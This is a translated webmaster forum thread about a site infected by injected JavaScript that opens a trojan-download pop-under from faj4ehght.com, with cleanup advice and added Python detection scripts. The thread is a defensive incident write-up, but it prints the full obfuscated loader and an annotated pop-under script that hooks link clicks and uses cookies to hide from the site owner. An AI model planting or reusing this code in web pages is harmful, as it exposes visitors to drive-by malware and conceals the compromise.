• User Newbie

    Problem with Autolink (faj4ehght.com)

    Hi, greetings to the whole GT forum.
    Guys, I'm writing because I have a problem that, despite my knowledge, I can't manage to solve.
    On one of my websites, when the home page opens, a link opens automatically that leads to downloading trojans; the link in question is this: faj4ehght.com (please, it is my duty to warn you that on opening the link mentioned two trojans will try to download onto your PC, so it's better not to go there).

    I've been tinkering for a few weeks and can't get anywhere. This only happens on the portal, which has now been taken offline, while on the forum, vBulletin, this problem doesn't occur.

    Could you give me some advice on how to try to remove it?
    Reading on some other sites, I'm not the only one with this problem, but there is nothing on how to resolve it.

    I look forward to your advice, opinion or any hint for solving this problem. I'm on the first page of the search engines and this problem is, in some way, making me lose positions, which I've contained through the robot, by making it visit redirect pages and blocking access to those that seem infected.

    Currently the portal is offline and I've left only the forum open, so if any of you would like to try to access it to see what it's about, I can create an account to access the offline mode where the problem can be observed.


  • User Newbie

    Well guys, I managed to solve the problem by paying a bit of attention and doing server-side tests. I'll try to summarise the whole process of analysis and cleanup so that, if anyone (let's hope not) runs into the same problem, they can "easily" solve it.

    The problem is caused by an obfuscated javascript file, which is written through a .pl file that searches for some weak scripts on the domain, in particular on the domains residing on the same Shell Hosting, which in turn have vulnerabilities.

    The obfuscated javascript is called JS_AFIT.A, and it is called from the site's pages, or from some vulnerable files of the apache server.
    Through brute force, a vulnerable javascript file contained on your site is modified, inserting the code that calls the "malware" into the document.write.

    In my case it appeared in this form:

    document.write('<script language="javascript">$="%63c%3d%225ngt%2568;i%252b+)%257bt%256dp%253dds.%2573%256ci%2563e%2528i,i%252b1)%253bst%25%22;cu%3d%22(gwf}d`4xuzsausq)6~ubugwf}d`6*}r4%3czub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dobuf4d%7bdKazpqf4)4zaxx%2fbuf4d%7bdKw%7b%7b%257F}qKzuyq4)46upbyu%257FqfK%257F%7byud6%2fbuf4d%7bdK`}yq%7ba`4)4#%2526$%2frazw`}%7bz4d%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3dobuf4}gKqzuvxqp4)4ruxgq%2f}r4%3c5c}zp%7bc:%7bdqfu42245zub}su`%7bf:w%7b%7b%257F}qQzuvxqp%3dfq`afz4}gKqzuvxqp%2f}r4%3c`mdq%7br4p%7bwayqz`:w%7b%7b%257F}q4))43g`f}zs3%3d}r4%3cp%7bwayqz`:w%7b%7b%257F}q:xqzs`|4))4$%3dop%7bwayqz`:w%7b%7b%257F}q4)46`qg`6%2f}gKqzuvxqp4)4p%7bwayqz`:w%7b%7b%257F}q4))43`qg`3%2fp%7bwayqz`:w%7b%7b%257F}q4)433%2fiqxgqo}gKqzuvxqp4)4`faq%2fifq`afz4}gKqzuvxqp%2firazw`}%7bz4d%7bdKsq`W%7b%7b%257F}q%3czuyq%3dobuf4w%7b%7b%257F}q4)46464?4p%7bwayqz`:w%7b%7b%257F}q%2fbuf4gqufw|4)46464?4zuyq4?46)6%2fbuf4gq`G`f4)4zaxx%2fbuf4%7brrgq`4)4$%2fbuf4qzp4)4$%2f}r4%3cw%7b%7b%257F}q:xqzs`|4*4$%3do%7brrgq`4)4w%7b%7b%257F}q:}zpql[r%3cgqufw|%3d%2f}r4%3c%7brrgq`45)49%25%3do%7brrgq`4?)4gqufw|:xqzs`|%2fqzp4)4w%7b%7b%257F}q:}zpql[r%3c6%2f684%7brrgq`%3d%2f}r4%3cqzp4))49%25%3doqzp4)4w%7b%7b%257F}q:xqzs`|%2figq`G`f4)4azqgwudq%3cw%7b%7b%257F}q:gavg`f}zs%3c%7brrgq`84qzp%3d%3d%2fiifq`afz%3cgq`G`f%3d%2firazw`}%7bz4d%7bdKgq`W%7b%7b%257F}q4%3czuyq84buxaq%3dop%7bwayqz`:w%7b%7b%257F}q4)4zuyq4?46)64?4qgwudq%3cbuxaq%3d4?46%2f4qld}fqg)Rf}pum8%27%259Pqw9!$4%2526%27.!-.!-4SY@%2f4du`|);%2f6%2firazw`}%7bz4g|%7bcKd%7bd%3c%3dobuf4d%7bdKczp4)46|``d.;;rvwyr}f:w%7by;ws}9v}z;}zpql:ws}+sf%7bv}z6%2fbuf4rquKczp4)46gwf%7bxxvufg)%258fqg}nuvxq)%258`%7b%7bxvuf)%258x%7bwu`}%7bz)%258yqzavuf)%258g`u`ag)%258p}fqw`%7bf}qg)$6%2fbuf4zqqpK%7bdqz4)4`faq%2f}r4%3cp%7bwayqz`:%7bzwx}w%257FKw%7bdm45)4zaxx%3dp%7bwayqz`:%7bzwx}w%257FKw%7bdm%3c%3d%2f}r4%3cp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm45)4zaxx%3dp%7bwayqz`:v%7bpm:%7bzvqr%7bfqazx%7bupKw%7bdm%3c%3d%2f}r4%3cd%7bdKazpqf45)4zaxx%3do}r4%3c5d%7bdKazpqf:wx%7bgqp%3dzqqpK%7bdqz4)4ruxg
q%2fi}r4%3czqqpK%7bdqz%3do}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3dobux4)4d%7bdKsq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq%3d%2f}r4%3cbux45)4zaxx%3doz%7bc4)4zqc4Pu`q%3c%3d%2fbux%25264)4zqc4Pu`q%3cbux%3d%2fa`w%27%25264)4Pu`q:A@W%3cz%7bc:sq`RaxxMquf%3c%3d84z%7bc:sq`Y%7bz`|%3c%3d84z%7bc:sq`Pu`q%3c%3d84z%7bc:sq`%255C%7bafg%3c%3d84z%7bc:sq`Y}za`qg%3c%3d84z%7bc:sq`Gqw%7bzpg%3c%3d%3d%2fa`w%25264)4Pu`q:A@W%3cbux%2526:sq`RaxxMquf%3c%3d84bux%2526:sq`Y%7bz`|%3c%3d84bux%2526:sq`Pu`q%3c%3d84bux%2526:sq`%255C%7bafg%3c%3d84bux%2526:sq`Y}za`qg%3c%3d84bux%2526:sq`Gqw%7bzpg%3c%3d%3d%2f}r4%3c4%3c4a`w%27%2526494a`w%25264%3d4;4%25$$$4(4d%7bdK`}yq%7ba`%3e%2522$%3dozqqpK%7bdqz4)4ruxgq%2fiiii}r4%3czqqpK%7bdqz%3doazpqf4)4c}zp%7bc:%7bdqz%3cd%7bdKczp846684rquKczp%3d%2fazpqf:vxaf%3c%3d%2fc}zp%7bc:r%7bwag%3c%3d%2f}r4%3cd%7bdKw%7b%7b%257F}qKqzuvxqp%3c%3d%3doz%7bc4)4zqc4Pu`q%3c%3d%2fd%7bdKgq`W%7b%7b%257F}q%3cd%7bdKw%7b%7b%257F}qKzuyq84z%7bc%3d%2fiiirazw`}%7bz4d%7bdK}z}`%3c%3dobuf4bqf4)4dufgqRx%7bu`%3czub}su`%7bf:uddBqfg}%7bz%3d%2fbuf4bqf%25264)4%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-!6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4-,6%3d*)$4hh4zub}su`%7bf:agqfUsqz`:}zpql[r%3c6C}zp%7bcg4Z@6%3d*)$4%3d22%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3[dqfu3%3d4))49%25%3d22%3czub}su`%7bf:uddZuyq45)43Zq`gwudq3%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3YG]Q3%3d4*49%25%3d422%3czub}su`%7bf:agqfUsqz`:}zpql[r%3c3GB%253%3d4*49%25%3d422%3cbqf4*)4%2520%3d%2f}r4%3cbqf%2526%3do}r4%3cp%7bwayqz`:x}z%257Fg%3dor%7bf4%3cbuf4})$%2f4}(p%7bwayqz`:x}z%257Fg:xqzs`|%2f4}??%3do}r4%3cp%7bwayqz`:x}z%257FgO}I:`ufsq`45)46Kvxuz%257F6%3dop%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F%2fp%7bwayqz`:x}z%257FgO}I:%7bzwx}w%257F4)4g|%7bcKd%7bd%2fiiiip%7bwayqz`:%7bzwx}w%257FKw%7bdm4)4p%7bwayqz`:%7bzwx}w%257F%2fp%7bwayqz`:%7bzy%7bagqad4)4g|%7bcKd%7bd%2fid%7bdK}z}`%3c%3d%2fi(;gwf}d`*%22;ca%3d%22%2566%2575nc%2574%2569o%256e%2520dcs%2528ds%252ce%2573)%257bds%253dun%2565s%2563ap%22;de%3d%22M+}Sx-|
)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:%2526950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;da%3d%22fqb0})-~ug0Qbbqi87|qe~%257F7%3c7%7brtfu7%3c7zsdxb7%3c7ytvyb7%3c7xufyv7%3c7wvhuc7%3c7vwfuc7%3c7uxwxd7%3c7tzu~y7%3c7s%7bud~7%3c7r||uf7%3c7q}dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7%7b7%3c7|7%3c7}7%3c7~7%3c7%257F7%22;dd%3d%22iSx%2522%3c}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950%25265##950%2522%2526M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209%22;db%3d%22%3c7`7%3c7a7%3c7b7%3c7c7%3c7d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c%2526%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudT%22;ce%3d%22%2561%2572Co%2564e%2541t(%2530)^%2528%25270x0%2530%2527+es%2529%2529);}%257d%22;st%3d%22%2573%2574%253d%2522$%253dst%253bd%2563s%2528d%2561+%2564b%252b%2564c%252b%2564d%252bd%2565%252c%25310%2529;%2564%2577%2528%2573%2574)%253bs%2574%253d$%253b%2522;%22;op%3d%22%2524%253d%2522dw(dc%2573%2528c%2575,1%2534%2529);%2522;%22;dz%3d%22%2566u%256ecti%256fn%2520dw%2528%2574)%257bc%2561%253d%2527%252564o%252563%252575me%256e%252574%25252ewr%252569t%252565%252528%252522%2527;c%2565%253d%2527%252522%252529%2527;cb%253d%2527%25253csc%252572i%252570t%2525%25320la%256e%252567%2575%252561%252567%2565%25253d%25255c%25252%2532j%2561va%25257%2533%2563ri%252570t%25255c%252522%25253e%2527;cc%253d%2527%25253c%25255c%25252f%2573c%2572i%2570%252574%25253e%2527;%2565%2576a%256c%2528un%2565sca%2570e(%2574))%257d;%22;cb%3d%22e%2528ds%2529;%2573t%253dt%256dp%253d%2527%2527;for(%2569%253d%2530;i%253cds.l%256%22;cz%3d%22%2566%2575%256ect%2569on%2520%2563z%2528cz)%257bret%2575rn%2520%2563a%252bc%2562+%2563c%252b
cd+%2563e+%2563z;%257d;%22;dc%3d%22qi89;%25229+u|cu0d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8$:t99;8}Nt9:$9;t9+budeb~0b+mfqb0t-7vrs}vyb%3es%257F}7+fqb0iSx!%3c%22;cd%3d%223dst+%2553tr%2569n%2567.f%2572%256fmCh%2561rC%256f%2564e((%2574%256d%2570.%2563h%22;%69f%20%28d%6f%63um%65nt%2eco%6fk%69e.%69n%64ex%4ff%28%27vbu%6clet%69n%5f%6du%6cti%71u%6f%74%65%3d%27)%3d%3d-1%29%7bs%63%28%27vbull%65tin%5fmul%74iqu%6ft%65%3d%27,2,7%29;ev%61l(u%6e%65s%63%61%70e(%64z+%63z+o%70+st%29+%27d%77(%64z%2b%63z%28$%2b%73t)%29;%27)%7dels%65%7b$%3d%27%27};functio%6e sc%28c%6em,v%2ced)%7bva%72 ex%64%3dn%65%77 Da%74%65%28);%65x%64.se%74Dat%65%28exd%2ege%74%44%61te(%29+%65%64);%64oc%75%6dent%2ecoo%6bie%3d%63nm%2b %27%3d%27 +e%73%63ape%28v)+%27%3b%65xpi%72es%3d%27+exd.to%47M%54%53tr%69%6eg%28);%7d;";eval(unescape($));document.write($);</script>');
    It was placed in a javascript of a partner site included in all areas of my portal, except the forum.

    The code opens a popup to the webpage that automatically downloads the two trojans, and it is set up so that, if the cookies remain valid on the infected site, it is shown only once, so as not to alarm the webmaster through warning e-mails, or in any case to make the user believe it's an isolated case. When the cookies are deleted from the browser or from the portal, the problem reappears.
     
    Here is the code that acts on the cookies:

```javascript
if (navigator.cookieEnabled) {
  var pop_under = null;
  var pop_cookie_name = "advmaker_komap";   // cookie that marks "pop-under already shown"
  var pop_timeout = 720;                     // minutes before the pop-under is shown again

  // Returns true when the browser accepts cookies (writes and reads back a test cookie).
  function pop_cookie_enabled() {
    var is_enabled = false;
    if (!window.opera && !navigator.cookieEnabled) return is_enabled;
    if (typeof document.cookie == 'string')
      if (document.cookie.length == 0) {
        document.cookie = "test";
        is_enabled = document.cookie == 'test';
        document.cookie = '';
      } else {
        is_enabled = true;
      }
    return is_enabled;
  }

  // Reads the value of a named cookie, or null when it is absent.
  function pop_getCookie(name) {
    var cookie = " " + document.cookie;
    var search = " " + name + "=";
    var setStr = null;
    var offset = 0;
    var end = 0;
    if (cookie.length > 0) {
      offset = cookie.indexOf(search);
      if (offset != -1) {
        offset += search.length;
        end = cookie.indexOf(";", offset);
        if (end == -1) { end = cookie.length; }
        setStr = unescape(cookie.substring(offset, end));
      }
    }
    return (setStr);
  }

  // Long-lived cookie (year 2050) so the pop-under stays suppressed for that browser.
  function pop_setCookie(name, value) {
    document.cookie = name + "=" + escape(value) + "; expires=Friday,31-Dec-50 23:59:59 GMT; path=/;";
  }

  function show_pop() {
    var pop_wnd = "LINK faj4ehght.com/cgi-bin/index.cgi?grobin";   // the forum replaced the URL scheme with "LINK"
    // The feature string was garbled in the post; "scrollbars=1,resizable=1" is reconstructed from the encoded copy.
    var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";
    var need_open = true;
    if (document.onclick_copy != null) document.onclick_copy();
    if (document.body.onbeforeunload_copy != null) document.body.onbeforeunload_copy();
    if (pop_under != null) {
      if (!pop_under.closed) need_open = false;
    }
    if (need_open) {
      if (pop_cookie_enabled()) {
        val = pop_getCookie(pop_cookie_name);
        if (val != null) {
          now = new Date();
          val2 = new Date(val);
          utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());
          utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());
          // Skip the pop-under if the cookie is younger than pop_timeout minutes
          // (the "*" was swallowed by the forum's formatting in the posted copy).
          if ((utc32 - utc2) / 1000 < pop_timeout * 60) { need_open = false; }
        }
      }
    }
    if (need_open) {
      under = window.open(pop_wnd, "", fea_wnd);   // open the malicious page behind the current window
      under.blur();
      window.focus();
      if (pop_cookie_enabled()) {
        now = new Date();
        pop_setCookie(pop_cookie_name, now);      // remember when it was shown
      }
    }
  }

  // Only targets IE on Windows; hooks every link's onclick plus the document's onmouseup.
  function pop_init() {
    var ver = parseFloat(navigator.appVersion);
    var ver2 = (navigator.userAgent.indexOf("Windows 95") >= 0 || navigator.userAgent.indexOf("Windows 98") >= 0 || navigator.userAgent.indexOf("Windows NT") >= 0)
      && (navigator.userAgent.indexOf('Opera') == -1)
      && (navigator.appName != 'Netscape')
      && (navigator.userAgent.indexOf('MSIE') > -1)
      && (navigator.userAgent.indexOf('SV1') > -1)
      && (ver >= 4);
    if (ver2) {
      if (document.links) {
        for (var i = 0; i < document.links.length; i++) {
          // "[i]" was rendered as italics by the forum's BBCode and shows as "*" in the posted copy.
          if (document.links[i].target != "_blank") {
            document.links[i].onclick_copy = document.links[i].onclick;
            document.links[i].onclick = show_pop;
          }
        }
      }
    }
    document.onclick_copy = document.onclick;
    document.onmouseup = show_pop;
  }
  pop_init();
}
```

      We proceed by entering the infected page and, through the Web Developer toolbar, going to the INFORMATION function and choosing the View JavaScript item from the menu.

      A page will open showing all the javascript code contained in the infected page.
      At this point two pieces of code will appear, namely the **document.write** code and the **if (navigator.cookieEnabled)…** code.

      **Note:** the **if (navigator.cookieEnabled)…** code might not appear if the malicious popup has already been shown, and therefore the cookie recording session has started.

      At this point we look for the javascript file that was compromised with this same code.
      **And what if it was a server file that got infected?**
        The server file that gets infected has the same line of code but doesn't use the cookies, so the server administrators will have the same problem on all the sites on the infected server and will, hopefully, remove them themselves; in any case it's a good idea to report the problem as soon as it is found.

    I hope I've been of some help. I thank my friend nassim for giving me some input needed to focus attention on some aspects I had overlooked and that led me to solve the problem.
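    As an added example (not code from the thread), the outer `$="...";eval(unescape($))` layer of a loader like the one described above can be peeled statically, so the next stage can be read without executing it. The sample line below is constructed here; the cookie name in it is an assumption chosen to look like a vBulletin cookie, the way the thread's loader does.

```python
import re

def js_unescape(s):
    """Mirror of JavaScript unescape(): decodes %uXXXX and %XX sequences, leaves the rest alone."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def js_escape(s):
    """Mirror of JavaScript escape(); only used here to build the constructed sample."""
    out = []
    for ch in s:
        if ch.isascii() and (ch.isalnum() or ch in "@*_+-./"):
            out.append(ch)
        elif ord(ch) < 256:
            out.append("%%%02X" % ord(ch))
        else:
            out.append("%%u%04X" % ord(ch))
    return "".join(out)

# Shape of the injected line seen in the thread:
#   document.write('<script ...>$="<escaped stage>";eval(unescape($));document.write($);</script>');
LOADER_RE = re.compile(r"document\.write\('<script[^>]*>\$=\"(.*?)\";eval\(unescape\(\$\)\)", re.S)

def extract_loader(html):
    """Return the decoded first stage and the cookie names it checks, or None when no loader is present."""
    m = LOADER_RE.search(html)
    if m is None:
        return None
    decoded = js_unescape(m.group(1))
    # A document.cookie.indexOf('name=') check is what makes the payload fire only once per browser.
    cookies = re.findall(r"document\.cookie\.indexOf\('([^']*)'\)", decoded)
    return {"decoded": decoded, "gating_cookies": cookies}

# Constructed sample (assumption): a first stage that sets a vBulletin-looking cookie for 7 days
# and only then evaluates the next layer. A real loader carries several more layers after this.
INNER = ("if (document.cookie.indexOf('vbulletin_multiquote=')==-1)"
         "{sc('vbulletin_multiquote=',2,7);eval(unescape(dz+cz+op+st));}else{$='';}")
SAMPLE_LINE = ("document.write('<script language=\"javascript\">$=\""
               + js_escape(INNER) + "\";eval(unescape($));document.write($);</script>');")

if __name__ == "__main__":
    found = extract_loader(SAMPLE_LINE)
    print("gating cookies:", found["gating_cookies"])
    print("first stage   :", found["decoded"])
```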

  • User Newbie

    Hi, I've ended up in this discussion on what should be a holiday for many, because I've had a similar problem for a couple of days (no holiday for me for now).
    I have a site based on md-pro on aruba (linux) that is compromised by very similar code (I think the only difference is that it points to bassamtwe.com instead of faj4eghth.com) which I don't know how to remove, since it doesn't appear in the index.php files.
    I haven't managed to find other info on js_afit.a... could it be js_afir.a?
    Thanks for your attention.


  • ModSenior

    Hi cb,

    You can try downloading all the scripts from the server, and use a program like Dreamweaver to check for the presence of that code in the files.
    The code is surely in a file with permissions set to 777.

    To prevent the problem from occurring again, check whether there are updates for the CMS, and remove write permissions on the files that don't require 777.
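    One way to do the check suggested in this reply on a downloaded copy of the site, as an added example rather than code from the thread: flag files that contain the loader's indicator strings and files that are world-writable (777). The indicator strings come from the thread's own description; the sample tree is constructed inside the block.

```python
import os
import stat
import tempfile

# Strings that mark the injected loader, as described earlier in the thread.
INDICATORS = ("eval(unescape($))", "advmaker_komap", "faj4ehght.com")
SCAN_EXT = (".js", ".php", ".html", ".htm", ".pl")

def scan_webroot(root):
    """Return sorted (relative path, reasons) pairs; reasons are 'world-writable' or 'indicator:<string>'."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if stat.S_ISLNK(mode):          # do not follow symlinks out of the tree
                continue
            reasons = []
            if mode & stat.S_IWOTH:         # any account on the shared host can write here
                reasons.append("world-writable")
            if name.lower().endswith(SCAN_EXT):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                reasons += ["indicator:" + s for s in INDICATORS if s in text]
            if reasons:
                findings.append((os.path.relpath(path, root), sorted(reasons)))
    return sorted(findings)

def build_demo_tree():
    """Constructed sample: a partner script carrying the loader in a 777 file, a clean index, a 777 image."""
    root = tempfile.mkdtemp(prefix="webroot_")
    def put(rel, content, mode):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    put("partner/banner.js",
        "function show(){}\n"
        "document.write('<script>$=\"%61\";eval(unescape($));document.write($);</script>');\n", 0o777)
    put("index.php", "<?php echo 'hello'; ?>\n", 0o644)
    put("forum/images/logo.png", "not-a-script\n", 0o777)
    return root

if __name__ == "__main__":
    for rel, reasons in scan_webroot(build_demo_tree()):
        print(rel, "->", ", ".join(reasons))
```

A world-writable file with no indicator hit is still worth a look, since that is where the next injection lands.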